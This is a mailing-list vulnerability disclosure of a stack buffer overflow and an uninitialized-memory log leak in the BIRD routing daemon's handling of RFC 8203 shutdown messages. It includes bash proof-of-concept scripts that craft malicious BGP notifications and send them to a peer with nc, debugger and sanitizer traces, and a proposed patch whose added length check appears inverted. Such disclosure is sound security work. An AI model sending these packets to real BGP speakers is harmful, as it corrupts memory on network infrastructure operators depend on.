Stack overflow in RFC 8203 BGP admin. shutdown comm. handling since 7ff34ca2

Daniel McCarney cpu at letsencrypt.org
Sun Sep 8 19:59:03 CEST 2019


Hi there,

I believe a stack overflow was introduced in the BGP protocol support of BIRD in
7ff34ca2[1] that allows a BGP peer to corrupt stack memory via crafted RFC
8203[0] BGP administrative shutdown communication message.

Leading with the best news, it looks like 7ff34ca2 hasn't been included in
a release yet :-) I didn't realize the bug was limited to this commit until the
very end of my analysis so I hope you'll indulge me in my detailed writeup. It
was as much to convince myself I wasn't wrong about my understanding as it was
to help make the fix easier. I've included a patch with a fix at the very end.

While I believe 7ff34ca2 introduced the ability to overflow a stack buffer it
seems to me the original RFC 8203 support hasn't been correctly verifying
shutdown communication `msg_len` since support was added in BIRD 2 versions >=
2.0.0 and BIRD 1 versions >= 1.6.4. Details to follow.

[0]: https://tools.ietf.org/html/rfc8203
[1]: https://gitlab.labs.nic.cz/labs/bird/commit/7ff34ca2cb86f3947bf049f73e76e6ce5d57e4a8

# Details

When BIRD receives a BGP packet with type 0x03 (`PKT_NOTIFICATION`) the packet
will make its way through the `bgp_rx`, `bgp_rx_packet`, and
`bgp_rx_notification` functions before being given to the `bgp_log_error`
function of `proto/bgp/packets.c`.

The `bgp_log_error` function allocates a fixed sized buffer on the stack
(`argbuf`), and a pointer to the start of the buffer (`t`):

```c
byte argbuf[256], *t = argbuf;
```

If the notification packet has major error code 0x06 (Cease), and minor error
code 0x02 or 0x04 (Administrative Shutdown or Administrative Reset) then
`bgp_log_error` invokes `bgp_handle_message` to handle the notification as a RFC
8203 shutdown communication. The `bgp_handle_message` function is provided as
arguments the notification packet data and the `t` pointer to `argbuf`.

```c
  /* RFC 8203 - shutdown communication */
  if (((code == 6) && ((subcode == 2) || (subcode == 4))))
    if (bgp_handle_message(p, data, len, &t))
      goto done;
```

The `bgp_handle_message` function attempts to verify that the packet data and
message data are properly sized by checking `msg_len` (populated from the RFC
8203 shutdown communication length field) and `len` (the overall read packet
length):

```c
  /* Handle proper message */
  if ((msg_len > 255) && (msg_len + 1 > len))
    return 0;
```

In BIRD revision 7ff34ca2 the first part of the expression was changed to:

```c
(msg_len > 255)
```

Where it was previously:

```c
(msg_len > 128)
```

This turns out to have been important for the scope of this bug because `argbuf`
is `256` bytes.

Later, post-verification the message is saved to the `bgp_proto` struct's
`message` field `using `proto_set_message`, and then written to `*bp` with
`bsprintf`.

```c
  proto_set_message(&p->p, msg, msg_len);
  *bp += bsprintf(*bp, ": \"%s\"", p->p.message);
  return 1;
```

Unfortunately the expression in the defensive "Handle proper message" check is
incorrect in two ways.

First, if `msg_len + 1` is > `len` but <= 255 then the defensive expression will
short-circuit as false and execution continues. This results in the
`proto_set_message` buffer being sized equal to `msg_len` but only filed with
`len` bytes (which may be 0) of provided message data. The unaccounted for
message bytes will contain uninitialized memory contents that will be written to
the log as part of the RFC 8203 shutdown communication.

Second, and more crucially, the `msg_len > 255` calculation fails to account for
the 4 extra bytes that will be written by the `bsprintf` formatting expression.
E.g. there will be three bytes that precede the `msg_len` message bytes (`: "`)
and one byte that follows them (`"`).

The `bsprintf` function from `lib/printf.c` specifically warns that without care
its use can result in buffer overflows:

```c
/**
 * This function is equivalent to bvsnprintf() with an infinite
 * buffer size and variable arguments instead of a &va_list.
 * Please use carefully only when you are absolutely
 * sure the buffer won't overflow.
 */
```

And indeed because of the miscalculation in `bgp_handle_message` a notification
message with `msg_len` >= 252 bytes and < 256 will cause `bsprintf` to
overflow the fixed
size `argbuf` buffer that is the target of the `bsprintf` write.

Sending a RFC 8203 shutdown communication notification that has a message length
of `0xFF` (255) will result in four bytes being written past the end of the
`argbuf` buffer into adjacent stack memory by the `bsprintf` invocation in
`bgp_handle_message`, two of them are attacker controlled and two are not (a `"`
from the end of the format specifier and a null byte added by `bgp_log_error`
after `bgp_handle_message` returns non-zero).

## RFC 8203-bis vs RFC 8203

Initially BIRD 2.0.0 and 1.6.4 added support for RFC 8203 as written. Section
2 of that RFC describes the shutdown communication packet fields saying of the
length:

> The length value MUST range from 0 to 128 inclusive. When the length value is
> zero, no Shutdown Communication field follows.

An update to RFC 8203, RFC 8203-bis updates the description of the length field
saying:

> Length: this 8-bit field represents the length of the Shutdown Communication
> field in octets. When the length value is zero, no Shutdown Communication
> field follows.

When the maximum `msg_len` allowed by BIRD was 128 it wasn't possible to run
past the end of the `argbuf` buffer. When the maximum allowed `msg_len` was
changed to 255 to support RFC 8203 the overflow becomes possible.

# Reproduction

## Memory leaked to log

Reproducing the leak of raw unitialized memory to the log file can be done by
sending an RFC 8203 shutdown notification with a large communication length
(`msg_len`) and no communication message to a BIRD instance with BGP support
configured to peer with the sending machine (e.g. one that will process the BGP
message without producing a "Unexpected connect from unknown address" error).
The peer does not have to be in an established state.

```bash
BGP_MARKER="\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
LEN="\x00\x16"   # 22 bytes (must be >= 22 or it will be rejected by
`bgp_rx_notification` or `bgp_handle_message` as being too short
TYPE="\x03"      # NOTIFICATION type
MAJOR_ERR="\x06" # Cease major error
MINOR_ERR="\x02" # Admin shutdown minor error
COMM_LEN="\xFF"  # 255 bytes, maximum allowed value for the one octet size field

# NOTE: Crucially the PKT does NOT have a message! It should have a 255 byte
# message but that has been deliberately omitted.
PKT="$BGP_MARKER\
$LEN$TYPE\
$MAJOR_ERR\
$MINOR_ERR\
$COMM_LEN"

printf "$PKT" | nc <BIRD IP> 179 >/dev/null
```

In the BIRD logs this will result in something like:

2019-09-08 16:58:03.023 <RMT> egpeer: Received: Administrative
shutdown: "¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾"

The content of the message will differ based on the runtime state of the BIRD
instance. In the above case it appears to be stack memory produced from building
with `-fsanitize=address`.

To reproduce against a version of BIRD >2.0.0 or >1.6.4 but older than 7ff34ca2
the `COMM_LEN` must be changed to be <= 128 bytes.

I don't believe this has security impact but someone more clever than me may be
able to find a way to use this to avoid the sanitization of low ASCII
characters (e.g. newlines, terminal control sequences, etc) in
`bgp_handle_message`. I mostly mention it because it's definitely buggy
behaviour.

## Stack overflow

Reproducing the stack overflow can be done by sending an RFC 8203 shutdown
notification with a communication length (`msg_len`) and message > 252 bytes to
a BIRD instance with BGP support configured to peer with the sending machine
(e.g. one that will process the BGP message without producing a "Unexpected
connect from unknown address" error). The peer does not have to be in an
established state.

```bash
BGP_MARKER="\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
LEN="\x00\x16"   # 22 bytes (must be >= 22 or it will be rejected by
`bgp_rx_notification` or `bgp_handle_message` as being too short
TYPE="\x03"      # NOTIFICATION
MAJOR_ERR="\x06" # Cease major error
MINOR_ERR="\x02" # Admin shutdown minor error
COMM_LEN="\xFF"  # 255 bytes
COMM=$(printf 'a%.0s' {1..253}) # 253 bytes of "a" to fill the true
available argbuf size
COMM="${COMM}!!" # two bytes of attacker controlled data to be written
past the end of argbuf

PKT="$BGP_MARKER\
$LEN$TYPE\
$MAJOR_ERR\
$MINOR_ERR\
$COMM_LEN\
$COMM"

printf "$PKT" | nc <BIRD IP> 179 >/dev/null
```

In practice I find the stack overflow does not impact the availability of the
BIRD instance when built with normal settings. I confirmed the overflow two
ways: with `gdb` and by building BIRD with `-fsanitize=address`.

### GDB verification

To verify the overflow I set a breakpoint in `bgp_handle_message` on L2971 (the
`bsprintf` call) and checked the memory at the end of the `argbuf` buffer before
and after the `bsprintf` call when processing the reproduction packet from
above.

2971  *bp += bsprintf(*bp, ": \"%s\"", p->p.message);
(gdb) x/6xb *bp +255
0x7fffffffdd2f: 0x00 0x60 0x09 0x6e 0x00 0x00
(gdb) n
2972  return 1;
(gdb) x/6xb 0x7fffffffdd30
0x7fffffffdd30: 0x21 0x21 0x22 0x00 0x00 0x00

Before the `bsprintf` call the 6 bytes after the end of `argbuf` (by way of the
`*bp` pointer) are:

```c
0x00 0x60 0x09 0x6e 0x00 0x00
```

If there was no overflow these bytes should remain the same since they are
beyond the end of `argbuf`. Instead after stepping forward past the `bsprintf`
call 4 of the 6 bytes change:

```c
0x21 0x21 0x22 0x00 0x00 0x00
```

These bytes match to `!!"\0`, showing the two attacker controlled bytes and the
two bytes unconditionally written.

### Address Sanitizer verification

It's also possible to quickly verify the overflow by using
`CFLAGS=-fsanitize=address LDFLAGS=-fsanitize=address` with `./configure` prior
to building BIRD.

Sending the reproduction to a BIRD built with ASAN results in an immediate stack
overflow detection and program termination:

```
bird-srv_1     | 2019-09-03 18:34:21.166 <TRACE> egpeer: Incoming
connection from 10.90.90.3 (port 51270) accepted
bird-srv_1     | 2019-09-03 18:34:21.166 <TRACE> egpeer: Sending
OPEN(ver=4,as=66666,hold=240,id=0a5a5a02)
bird-srv_1     |
=================================================================
bird-srv_1     | ==1==ERROR: AddressSanitizer: stack-buffer-overflow
on address 0x7ffd95afe520 at pc 0x0000004913d4 bp 0x7ffd95afde80 sp
0x7ffd95afde70
bird-srv_1     | WRITE of size 1 at 0x7ffd95afe520 thread T0
bird-srv_1     |     #0 0x4913d3 in bvsnprintf lib/printf.c:268
bird-srv_1     |     #1 0x4932a9 in bsprintf lib/printf.c:501
bird-srv_1     |     #2 0x52f655 in bgp_handle_message proto/bgp/packets.c:2971
bird-srv_1     |     #3 0x52f87c in bgp_log_error proto/bgp/packets.c:3000
bird-srv_1     |     #4 0x52fc87 in bgp_rx_notification proto/bgp/packets.c:3029
bird-srv_1     |     #5 0x5301c2 in bgp_rx_packet proto/bgp/packets.c:3091
bird-srv_1     |     #6 0x53040e in bgp_rx proto/bgp/packets.c:3135
bird-srv_1     |     #7 0x549432 in call_rx_hook sysdep/unix/io.c:1794
bird-srv_1     |     #8 0x549907 in sk_read sysdep/unix/io.c:1882
bird-srv_1     |     #9 0x54b8b6 in io_loop sysdep/unix/io.c:2299
bird-srv_1     |     #10 0x5576d2 in main sysdep/unix/main.c:919
bird-srv_1     |     #11 0x7f91f2f5182f in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
bird-srv_1     |     #12 0x40bb38 in _start (/root/rundir/sbin/bird+0x40bb38)
bird-srv_1     |
bird-srv_1     | Address 0x7ffd95afe520 is located in stack of thread
T0 at offset 352 in frame
bird-srv_1     |     #0 0x52f6a3 in bgp_log_error proto/bgp/packets.c:2977
bird-srv_1     |
bird-srv_1     |   This frame has 2 object(s):
bird-srv_1     |     [32, 40) 't'
bird-srv_1     |     [96, 352) 'argbuf' <== Memory access at offset
352 overflows this variable
bird-srv_1     | HINT: this may be a false positive if your program
uses some custom stack unwind mechanism or swapcontext
bird-srv_1     |       (longjmp and C++ exceptions *are* supported)
bird-srv_1     | SUMMARY: AddressSanitizer: stack-buffer-overflow
lib/printf.c:268 bvsnprintf
bird-srv_1     | Shadow bytes around the buggy address:
bird-srv_1     |   0x100032b57c50: 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00
bird-srv_1     |   0x100032b57c60: 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00
bird-srv_1     |   0x100032b57c70: 00 00 00 00 00 00 00 00 f1 f1 f1 f1
00 f4 f4 f4
bird-srv_1     |   0x100032b57c80: f2 f2 f2 f2 00 00 00 00 00 00 00 00
00 00 00 00
bird-srv_1     |   0x100032b57c90: 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00
bird-srv_1     | =>0x100032b57ca0: 00 00 00 00[f3]f3 f3 f3 f3 f3 f3 f3
00 00 00 00
bird-srv_1     |   0x100032b57cb0: 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00
bird-srv_1     |   0x100032b57cc0: 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00
bird-srv_1     |   0x100032b57cd0: 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00
bird-srv_1     |   0x100032b57ce0: 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00
bird-srv_1     |   0x100032b57cf0: 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00
bird-srv_1     | Shadow byte legend (one shadow byte represents 8
application bytes):
bird-srv_1     |   Addressable:           00
bird-srv_1     |   Partially addressable: 01 02 03 04 05 06 07
bird-srv_1     |   Heap left redzone:       fa
bird-srv_1     |   Heap right redzone:      fb
bird-srv_1     |   Freed heap region:       fd
bird-srv_1     |   Stack left redzone:      f1
bird-srv_1     |   Stack mid redzone:       f2
bird-srv_1     |   Stack right redzone:     f3
bird-srv_1     |   Stack partial redzone:   f4
bird-srv_1     |   Stack after return:      f5
bird-srv_1     |   Stack use after scope:   f8
bird-srv_1     |   Global redzone:          f9
bird-srv_1     |   Global init order:       f6
bird-srv_1     |   Poisoned by user:        f7
bird-srv_1     |   Container overflow:      fc
bird-srv_1     |   Array cookie:            ac
bird-srv_1     |   Intra object redzone:    bb
bird-srv_1     |   ASan internal:           fe
bird-srv_1     | ==1==ABORTING
```

The reported stack trace matches the analysis of the `bgp_log_error` and
`bgp_handle_message` functions shared above.

# Fix

I think the correct fix is to change the bounds checking in
`bgp_handle_message`. For readability I think it's clearest to break the
expression into two:

```diff
--- a/proto/bgp/packets.c
+++ b/proto/bgp/packets.c
@@ -2954,10 +2954,20 @@ bgp_handle_message(struct bgp_proto *p, byte
*data, uint len, byte **bp)
   uint msg_len = data[0];
   uint i;

+  /* Handle only messages that won't overflow *bp (accounting for the extra
+   * bytes from the `bsprintf` format */
+  if (msg_len >= 252)
+    return 0;
+
   /* Handle zero length message */
   if (msg_len == 0)
     return 1;

+  /* Handle only messages with a length that does not require reading past the
+   * end of the received data. */
+  if (msg_len < (len - 1))
+    return 0;
+
   /* Handle proper message */
   if ((msg_len > 255) && (msg_len + 1 > len))
     return 0;
```

After applying this fix both the uninitialized memory log write and the stack
overflow are prevented and malformed messages are logged defensively.

I'm not an especially adept C programmer so YYMV. You folks may have a more
elegant/less brittle fix in mind :-)



More information about the Bird-users mailing list